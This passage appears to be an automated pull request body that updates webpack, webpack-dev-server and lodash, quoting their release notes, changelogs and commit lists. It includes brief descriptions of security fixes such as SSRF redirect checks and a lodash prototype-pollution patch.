\u003ccode\u003edotenv\u003c/code\u003e option to enable this plugin\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003eWebpackManifestPlugin\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdded support the \u003ccode\u003eignoreList\u003c/code\u003e option in devtool plugins\u003c/li\u003e\n\u003cli\u003eAllow to use custom javascript parse function\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack/blob/main/CHANGELOG.md\"\u003ewebpack's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.104.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2efd21b: Reexports runtime calculation should not accessing \u003cstrong\u003eWEBPACK_IMPORT_KEY\u003c/strong\u003e decl with var.\u003c/li\u003e\n\u003cli\u003ec510070: Fixed a user information bypass vulnerability in the HttpUriPlugin plugin.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.104.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed3dd841: Use method shorthand to render module content in \u003ccode\u003e__webpack_modules__\u003c/code\u003e object.\u003c/li\u003e\n\u003cli\u003ed3dd841: Enhance \u003ccode\u003eimport.meta.env\u003c/code\u003e to support object access.\u003c/li\u003e\n\u003cli\u003e4baab4e: Optimize dependency sorting in updateParent: sort each module only once by deferring to finishUpdateParent(), and reduce traversal count in sortWithSourceOrder by caching WeakMap values upfront.\u003c/li\u003e\n\u003cli\u003e04cd530: Handle more at-rules for CSS modules.\u003c/li\u003e\n\u003cli\u003ecafae23: Added options to control the renaming of at-rules and various identifiers in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added \u003ccode\u003ebase64url\u003c/code\u003e, \u003ccode\u003ebase62\u003c/code\u003e, \u003ccode\u003ebase58\u003c/code\u003e, \u003ccode\u003ebase52\u003c/code\u003e, \u003ccode\u003ebase49\u003c/code\u003e, \u003ccode\u003ebase36\u003c/code\u003e, \u003ccode\u003ebase32\u003c/code\u003e and \u003ccode\u003ebase25\u003c/code\u003e digests.\u003c/li\u003e\n\u003cli\u003e5983843: Provide a stable runtime function variable \u003ccode\u003e__webpack_global__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Improved \u003ccode\u003elocalIdentName\u003c/code\u003e hashing for CSS.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e22c48fb: Added module existence check for informative error message in development mode.\u003c/li\u003e\n\u003cli\u003e50689e1: Use the fully qualified class name (or export name) for \u003ccode\u003e[fullhash]\u003c/code\u003e placeholder in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Support universal lazy compilation.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed module library export definitions when multiple runtimes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed CSS nesting and CSS custom properties parsing.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't write fragment from URL to filename and apply fragment to module URL.\u003c/li\u003e\n\u003cli\u003eaab1da9: Fixed bugs for \u003ccode\u003ecss/global\u003c/code\u003e type.\u003c/li\u003e\n\u003cli\u003ed3dd841: Compatibility \u003ccode\u003eimport.meta.filename\u003c/code\u003e and \u003ccode\u003eimport.meta.dirname\u003c/code\u003e with \u003ccode\u003eeval\u003c/code\u003e devtools.\u003c/li\u003e\n\u003cli\u003ed3dd841: Handle nested \u003ccode\u003e__webpack_require__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e728ddb7: The speed of identifier parsing has been improved.\u003c/li\u003e\n\u003cli\u003e0f8b31b: Improve types.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't corrupt \u003ccode\u003edebugId\u003c/code\u003e injection when \u003ccode\u003ehidden-source-map\u003c/code\u003e is used.\u003c/li\u003e\n\u003cli\u003e2179fdb: Re-validate HttpUriPlugin redirects against allowedUris, restrict to http(s) and add a conservative redirect limit to prevent SSRF and untrusted content inclusion. Redirects failing policy are rejected before caching/lockfile writes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Serialize \u003ccode\u003eHookWebpackError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added ability to use built-in properties in dotenv and define plugin.\u003c/li\u003e\n\u003cli\u003e3c4319f: Optimizing the regular expression character class by specifying ranges for runtime code.\u003c/li\u003e\n\u003cli\u003ed3dd841: Reduce collision for local indent name in CSS.\u003c/li\u003e\n\u003cli\u003ed3dd841: Remove CSS link tags when CSS imports are removed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc\"\u003e\u003ccode\u003e24e3c2d\u003c/code\u003e\u003c/a\u003e chore(release): new release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20253\"\u003e#20253\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/2efd21b0b06baa9b1a7f009b336379dcef24c1a5\"\u003e\u003ccode\u003e2efd21b\u003c/code\u003e\u003c/a\u003e fix(re-exports): reexports runtime calculation should not accessing `__WEBPAC...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/c5100702335a9cdcb75558ccd80def2329bd4abf\"\u003e\u003ccode\u003ec510070\u003c/code\u003e\u003c/a\u003e fix(security): userinfo bypass vulnerability in HttpUriPlugin allowedUris\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/4b0501c69700963bad1285b56f9cfa74704cb963\"\u003e\u003ccode\u003e4b0501c\u003c/code\u003e\u003c/a\u003e ci: fix release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20252\"\u003e#20252\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/0c213cecf2906bc41102c3a4cfdd1ad3522d0171\"\u003e\u003ccode\u003e0c213ce\u003c/code\u003e\u003c/a\u003e ci: use \u003ccode\u003e\\\u0026lt;@\u0026amp;1450591255485743204\u0026gt;\u003c/code\u003e over \u003ccode\u003e@here\u003c/code\u003e for discord notificationw\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/5bf8bc51bcfb49d25b73aae450b246cd8b8b423a\"\u003e\u003ccode\u003e5bf8bc5\u003c/code\u003e\u003c/a\u003e refactor: types for benchmarks and tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/505a5e744fbcf4471ddb534bf1d4aebea9643c1b\"\u003e\u003ccode\u003e505a5e7\u003c/code\u003e\u003c/a\u003e chore(release): new release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20188\"\u003e#20188\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/0c066808d59e4f9406e11bab4ffa2e0feacbd0e2\"\u003e\u003ccode\u003e0c06680\u003c/code\u003e\u003c/a\u003e refactor: update eslint configuration\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/2eb0d6a410513960bd7d65bf15baf15704a612eb\"\u003e\u003ccode\u003e2eb0d6a\u003c/code\u003e\u003c/a\u003e ci: release announcement (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20238\"\u003e#20238\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/b2b24590a08755b706d2009ca97a226addf9e83b\"\u003e\u003ccode\u003eb2b2459\u003c/code\u003e\u003c/a\u003e ci: cancel in progress (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20239\"\u003e#20239\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack/compare/v5.90.0...v5.104.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 4.15.1 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadded \u003ccode\u003egetClientEntry\u003c/code\u003e and \u003ccode\u003egetClientHotEntry\u003c/code\u003e methods to get clients entries (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/dc642a832d45c23c5c7a08fbf29995e0db7e0d95\"\u003edc642a8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v4.15.1...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `lodash` from 4.17.23 to 4.18.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lodash/lodash/releases\"\u003elodash's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.18.1\u003c/h2\u003e\n\u003ch2\u003eBugs\u003c/h2\u003e\n\u003cp\u003eFixes a \u003ccode\u003eReferenceError\u003c/code\u003e issue in \u003ccode\u003elodash\u003c/code\u003e \u003ccode\u003elodash-es\u003c/code\u003e \u003ccode\u003elodash-amd\u003c/code\u003e and \u003ccode\u003elodash.template\u003c/code\u003e when using the \u003ccode\u003etemplate\u003c/code\u003e and \u003ccode\u003efromPairs\u003c/code\u003e functions from the modular builds. See \u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6167#issuecomment-4165269769\"\u003elodash/lodash#6167\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThese defects were related to how lodash distributions are built from the main branch using \u003ca href=\"https://github.com/lodash-archive/lodash-cli\"\u003ehttps://github.com/lodash-archive/lodash-cli\u003c/a\u003e. When internal dependencies change inside lodash functions, equivalent updates need to be made to a mapping in the lodash-cli. (hey, it was ahead of its time once upon a time!). We know this, but we missed it in the last release. It's the kind of thing that passes in CI, but fails bc the build is not the same thing you tested.\u003c/p\u003e\n\u003cp\u003eThere is no diff on main for this, but you can see the diffs for each of the npm packages on their respective branches:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elodash\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-es\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-amd\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash.template\u003c/code\u003e\u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.18.0\u003c/h2\u003e\n\u003ch2\u003ev4.18.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.0\"\u003ehttps://github.com/lodash/lodash/compare/4.17.23...4.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.unset\u003c/code\u003e / \u003ccode\u003e_.omit\u003c/code\u003e\u003c/strong\u003e: Fixed prototype pollution via \u003ccode\u003econstructor\u003c/code\u003e/\u003ccode\u003eprototype\u003c/code\u003e path traversal (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh\"\u003eGHSA-f23m-r3pf-42rh\u003c/a\u003e, \u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003efe8d32e\u003c/a\u003e). Previously, array-wrapped path segments and primitive roots could bypass the existing guards, allowing deletion of 